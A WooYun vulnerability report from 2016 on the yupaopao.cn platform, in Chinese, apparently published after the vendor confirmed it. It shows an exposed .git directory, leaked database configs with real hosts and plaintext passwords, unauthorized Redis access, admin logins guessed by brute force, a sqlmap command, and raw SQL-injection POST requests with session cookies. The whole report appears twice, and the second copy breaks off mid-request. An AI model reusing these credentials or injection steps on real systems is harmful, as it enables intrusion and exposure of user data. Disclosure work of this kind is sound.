当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0207715

漏洞标题:鱼泡泡漏洞打包(SQL注入+涉及80w用户信息+敏感信息泄露+redis未授权访问)

相关厂商:yupaopao.cn

漏洞作者: 黑色键盘丶

提交时间:2016-05-12 09:14

修复时间:2016-06-26 10:30

公开时间:2016-06-26 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-12: 细节已通知厂商并且等待厂商处理中
2016-05-12: 厂商已经确认,细节仅向厂商公开
2016-05-22: 细节向核心白帽子及相关领域专家公开
2016-06-01: 细节向普通白帽子公开
2016-06-11: 细节向实习白帽子公开
2016-06-26: 细节向公众公开

简要描述:

RT

详细说明:

首先是git源码泄露
http://121.40.223.69:8028/.git/config
用李姐姐的git脚本下载下来源码


1.png


来config找配置文件

2.png


database.php
---------------------------------------
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database type. ie: mysql. Currently supported:
mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Active Record class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
| (and in table creation queries made with DB Forge).
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['autoinit'] Whether or not to automatically initialize the database.
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/
$active_group = 'default';
$active_record = TRUE;
$db['default']['hostname'] = '120.55.130.50';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysql';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;
$db['read']['hostname'] = '120.55.130.50';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysql';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;
/* End of file database.php */
/* Location: ./application/config/database.php */
-------------------------
databasebak.php
-------------------------------
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database type. ie: mysql. Currently supported:
mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Active Record class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
| (and in table creation queries made with DB Forge).
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['autoinit'] Whether or not to automatically initialize the database.
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/
$active_group = 'default';
$active_record = TRUE;
$db['default']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysqli';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;
$db['read']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysqli';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;
/*活动激活的数据库 读写*/
$db['huodong_default']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_default']['username'] = 'crop_sys_admin';
$db['huodong_default']['password'] = 'yppcroprds2016';
$db['huodong_default']['database'] = 'ypp_cms_db';
$db['huodong_default']['dbdriver'] = 'mysqli';
$db['huodong_default']['dbprefix'] = '';
$db['huodong_default']['pconnect'] = TRUE;
$db['huodong_default']['db_debug'] = TRUE;
$db['huodong_default']['cache_on'] = FALSE;
$db['huodong_default']['cachedir'] = '';
$db['huodong_default']['char_set'] = 'utf8';
$db['huodong_default']['dbcollat'] = 'utf8_general_ci';
$db['huodong_default']['swap_pre'] = '';
$db['huodong_default']['autoinit'] = TRUE;
$db['huodong_default']['stricton'] = FALSE;
/*活动激活的数据库 读*/
$db['huodong_read']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_read']['username'] = 'crop_sys_admin';
$db['huodong_read']['password'] = 'yppcroprds2016';
$db['huodong_read']['database'] = 'ypp_cms_db';
$db['huodong_read']['dbdriver'] = 'mysqli';
$db['huodong_read']['dbprefix'] = '';
$db['huodong_read']['pconnect'] = TRUE;
$db['huodong_read']['db_debug'] = TRUE;
$db['huodong_read']['cache_on'] = FALSE;
$db['huodong_read']['cachedir'] = '';
$db['huodong_read']['char_set'] = 'utf8';
$db['huodong_read']['dbcollat'] = 'utf8_general_ci';
$db['huodong_read']['swap_pre'] = '';
$db['huodong_read']['autoinit'] = TRUE;
$db['huodong_read']['stricton'] = FALSE;
/* End of file database.php */
/* Location: ./application/config/database.php */


redis未授权访问
121.40.223.69:6379


尝试getshell 哎可惜不好使

3.png


然后找到管理系统 http://121.40.223.69:8028/admin/
爆破出5个用户名
chenyan
zhanglin
zhangyong
guochao
liyongsheng
然后试试用户密码相同的 liyongsheng liyongsheng guochao guochao 有2个用户


34.png


成功进入后台看到80w用户信息啦

5.png


哇好多哦

45.png


找了下后台sql注入 好多的 我就找了2个
post注入语法:sqlmap.py -r 1.txt --dbs 参数wangbano
-------------------post参数--------------------------------
POST /admin/pubwin_stores_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 98
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d2861bb11873a6c90460ef26416b6f89%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462990496%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D4bcb57eee7a61ab4f899d97f5db07424
pageNum=1&numPerPage=20&wangbano=1&store_name=1&server_version=1&can_recharge=&can_select_balance=
--------------------------另外一处----------参数 mobile--------------------
POST /admin/god_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 206
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221eae6a510bc7164581ec422a36287375%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462991222%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D681991a95831bb63fbe22bb5f789610c
pageNum=1&numPerPage=20&mobile=1&source=&isbind=&is_official=&price_begin=1&price_end=&god_company_id=&keyword=1&true_name=&gender=&status=&createtime_begin=2016-05-11&createtime_end=2016-05-19&city_name=11


数据库信息

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] ypp_app_test


表信息

Database: ypp_app_test
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| t_user_login | 4918627 |
| t_dongtai_reply | 3559021 |
| t_score_journal | 2950727 |
| t_recharge | 1722530 |
| t_notify | 1433701 |
| t_sms_log | 1269551 |
| t_god_score_log | 1092585 |
| t_platform_game_winner | 1040977 |
| t_user_ext | 802812 |
| t_user | 801473 |
| t_sys_invite_code | 772075 |
| t_wy_register | 641601 |
| t_coupon_detail | 638662 |
| t_user_journal | 488742 |
| t_sms_submail_log | 478570 |
| t_user_month_login | 470310 |
| t_dongtai | 428084 |
| t_dongtai_dashang | 405641 |
| t_god_lovelog | 398673 |
| t_fin_alipayjournal_old | 393343 |
| t_user_cash_journal | 389924 |
| t_recharge_pomotion_users | 327359 |
| t_play_order | 257786 |
| t_platform_game_winner_backup | 256938 |
| t_admin_log | 250742 |
| t_user_photo | 234687 |
| t_staff_drink | 229784 |
| t_signin | 220205 |
| t_chat_log | 186966 |
| t_mobile_area | 149310 |
| t_god_apply_photo | 129561 |
| t_play_response | 126662 |
| t_user_game | 111407 |
| t_god_journal | 109822 |
| t_user_oftenstore | 94596 |
| t_play_order_rate | 84686 |
| t_fin_alipayjournal | 70690 |
| t_store_recharge_day_report | 67199 |
| t_group_member | 63781 |
| t_god_cert | 62472 |
| t_god_apply | 54037 |
| t_fin_weixinjournal | 48846 |
| t_biz_log | 48316 |
| t_user_invite | 28339 |
| t_god_items | 25889 |
| t_store_machine | 25241 |
| t_play_order_god_rate | 24506 |
| t_user_count | 24095 |
| t_god_item_apply | 22043 |
| t_godgame_photo | 19752 |
| t_cash_give | 15052 |
| t_reserve | 14859 |
| t_god_jiesuan | 14262 |
| t_cash_get | 14107 |
| t_god_edit_apply | 13451 |
| t_bind_journal | 12344 |
| t_coupon_codes | 9311 |
| t_god | 9259 |
| t_god_order_day_log | 8445 |
| t_user_auth | 8151 |
| t_jubao | 7922 |
| t_play_order_day_report | 7280 |
| t_withdraw | 6647 |
| t_god_game | 6590 |
| t_dongtai_dashang_day_report | 6038 |
| t_god_search | 5982 |
| t_bind_journal_day_report | 5577 |
| t_group | 5017 |
| t_user_alias | 4613 |
| t_group_invitelog | 4476 |
| t_user_poi | 4013 |
| tmp_god_ids | 3909 |
| t_game_winner_day_report | 3415 |
| t_bind_journal_jiaoban_report | 3219 |
| t_shenzhi_code | 3000 |
| t_activity_member | 2947 |
| t_chat_check | 2805 |
| t_admin_role_function | 2638 |
| test_code | 2231 |
| t_biz_city_cat_price | 2186 |
| t_dongtai_dashang_jiaoban_report | 2071 |
| t_group_photo | 2035 |
| t_user_vip | 2015 |
| t_store_recharge_jiaoban_report | 1861 |
| t_tg_gudu | 1825 |
| t_game_winner_jiaoban_report | 1741 |
| t_user_journal_jiaoban_report | 1741 |
| t_fin_changelog | 1589 |
| t_suggestion | 1581 |
| t_store_region | 1541 |
| tmp_dongtai | 1182 |
| t_group_poi | 1065 |
| t_store | 753 |
| t_god_100 | 721 |
| t_activity | 677 |
| t_god_recommand | 525 |
| t_game_partition | 524 |
| t_biz_city_cat | 440 |
| t_activity_reply | 434 |
| t_sys_citys | 407 |
| tmp_gods | 381 |
| t_pubwin_stores | 373 |
| t_city | 372 |
| t_admin_function | 371 |
| t_play_order_shensu | 371 |
| t_ypp_money | 304 |
| t_game_duanwei | 296 |
| t_manual_recharge_to_ypp | 245 |
| t_apilist | 241 |
| t_gym | 237 |
| t_store_manager | 227 |
| t_coupon | 180 |
| t_mall_order | 128 |
| t_bizcircle | 122 |
| t_god_city | 95 |
| t_cat_tag | 90 |
| t_dongtai_keyword | 75 |
| t_game_weizhi | 73 |
| t_playorder_recharge_log | 64 |
| t_god_eidt_price_apply | 51 |
| t_admin_staff | 49 |
| t_banner | 39 |
| t_user_vip_hours | 35 |
| t_cat_level | 32 |
| t_pubwin_region | 31 |
| t_download_ypp | 30 |
| t_dictionary | 29 |
| t_coupon_laplus | 27 |
| t_user_black | 25 |
| t_tuiguang_qudao | 23 |
| t_user_subscribe | 22 |
| t_admin_role | 21 |
| t_biz_cat | 19 |
| t_sysmessage | 19 |
| t_biz_cat_price | 18 |
| t_region | 15 |
| t_game | 13 |
| t_biz_cert | 12 |
| t_recharge_promotion_detail | 12 |
| t_bank | 10 |
| t_search_hotwords | 10 |
| t_biz_navigation | 9 |
| t_recharge_promotion | 9 |
| t_wy_shop_region | 9 |
| t_huodong_item | 8 |
| t_user_vip_coupon | 8 |
| t_compaign | 7 |
| t_jubao_reason | 7 |
| t_act_prize_config | 6 |
| t_complain_custome | 6 |
| t_quiz_items | 6 |
| t_version | 6 |
| t_god_company | 5 |
| t_god_guides | 5 |
| t_user_attach | 5 |
| t_user_vip_config | 4 |
| t_chat_warn | 3 |
| t_coupon_user | 3 |
| t_hobby | 3 |
| t_mall_product | 3 |
| t_quiz | 3 |
| t_site | 3 |
| t_ad | 2 |
| t_city_new_cat_img | 2 |
| t_data_version | 2 |
| t_drink | 2 |
| t_home_recommand | 2 |
| t_huodong | 2 |
| t_act_qualifications_config | 1 |
| t_app_setting | 1 |
| t_god_cert_edit_apply | 1 |
| t_groupno | 1 |
| t_platform_game | 1 |
| t_pushmessage | 1 |
+----------------------------------+---------+


漏洞证明:

首先是git源码泄露
http://121.40.223.69:8028/.git/config
用李姐姐的git脚本下载下来源码


1.png


来config找配置文件

2.png


database.php
---------------------------------------
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database type. ie: mysql. Currently supported:
mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Active Record class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
| (and in table creation queries made with DB Forge).
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['autoinit'] Whether or not to automatically initialize the database.
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/
$active_group = 'default';
$active_record = TRUE;
$db['default']['hostname'] = '120.55.130.50';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysql';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;
$db['read']['hostname'] = '120.55.130.50';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysql';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;
/* End of file database.php */
/* Location: ./application/config/database.php */
-------------------------
databasebak.php
-------------------------------
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database type. ie: mysql. Currently supported:
mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Active Record class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
| (and in table creation queries made with DB Forge).
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['autoinit'] Whether or not to automatically initialize the database.
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/
$active_group = 'default';
$active_record = TRUE;
$db['default']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['default']['username'] = 'ypp_test';
$db['default']['password'] = 'vbnm1234_2015n1';
$db['default']['database'] = 'ypp_app';
$db['default']['dbdriver'] = 'mysqli';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;
$db['read']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';
$db['read']['username'] = 'ypp_test';
$db['read']['password'] = 'vbnm1234_2015n1';
$db['read']['database'] = 'ypp_app';
$db['read']['dbdriver'] = 'mysqli';
$db['read']['dbprefix'] = '';
$db['read']['pconnect'] = TRUE;
$db['read']['db_debug'] = TRUE;
$db['read']['cache_on'] = FALSE;
$db['read']['cachedir'] = '';
$db['read']['char_set'] = 'utf8';
$db['read']['dbcollat'] = 'utf8_general_ci';
$db['read']['swap_pre'] = '';
$db['read']['autoinit'] = TRUE;
$db['read']['stricton'] = FALSE;
/*活动激活的数据库 读写*/
$db['huodong_default']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_default']['username'] = 'crop_sys_admin';
$db['huodong_default']['password'] = 'yppcroprds2016';
$db['huodong_default']['database'] = 'ypp_cms_db';
$db['huodong_default']['dbdriver'] = 'mysqli';
$db['huodong_default']['dbprefix'] = '';
$db['huodong_default']['pconnect'] = TRUE;
$db['huodong_default']['db_debug'] = TRUE;
$db['huodong_default']['cache_on'] = FALSE;
$db['huodong_default']['cachedir'] = '';
$db['huodong_default']['char_set'] = 'utf8';
$db['huodong_default']['dbcollat'] = 'utf8_general_ci';
$db['huodong_default']['swap_pre'] = '';
$db['huodong_default']['autoinit'] = TRUE;
$db['huodong_default']['stricton'] = FALSE;
/*活动激活的数据库 读*/
$db['huodong_read']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';
$db['huodong_read']['username'] = 'crop_sys_admin';
$db['huodong_read']['password'] = 'yppcroprds2016';
$db['huodong_read']['database'] = 'ypp_cms_db';
$db['huodong_read']['dbdriver'] = 'mysqli';
$db['huodong_read']['dbprefix'] = '';
$db['huodong_read']['pconnect'] = TRUE;
$db['huodong_read']['db_debug'] = TRUE;
$db['huodong_read']['cache_on'] = FALSE;
$db['huodong_read']['cachedir'] = '';
$db['huodong_read']['char_set'] = 'utf8';
$db['huodong_read']['dbcollat'] = 'utf8_general_ci';
$db['huodong_read']['swap_pre'] = '';
$db['huodong_read']['autoinit'] = TRUE;
$db['huodong_read']['stricton'] = FALSE;
/* End of file database.php */
/* Location: ./application/config/database.php */


redis未授权访问
121.40.223.69:6379


尝试getshell 哎可惜不好使

3.png


然后找到管理系统 http://121.40.223.69:8028/admin/
爆破出5个用户名
chenyan
zhanglin
zhangyong
guochao
liyongsheng
然后试试用户密码相同的 liyongsheng liyongsheng guochao guochao 有2个用户


34.png


成功进入后台看到80w用户信息啦

5.png


哇好多哦

45.png


找了下后台sql注入 好多的 我就找了2个
post注入语法:sqlmap.py -r 1.txt --dbs 参数wangbano
-------------------post参数--------------------------------
POST /admin/pubwin_stores_list HTTP/1.1
Host: 121.40.223.69:8028
Proxy-Connection: keep-alive
Content-Length: 98
Accept: */*
Origin: http://121.40.223.69:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://121.40.223.69:8028/admin/index
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d2861bb11873a6c90460ef26416b6f89%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462990496%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs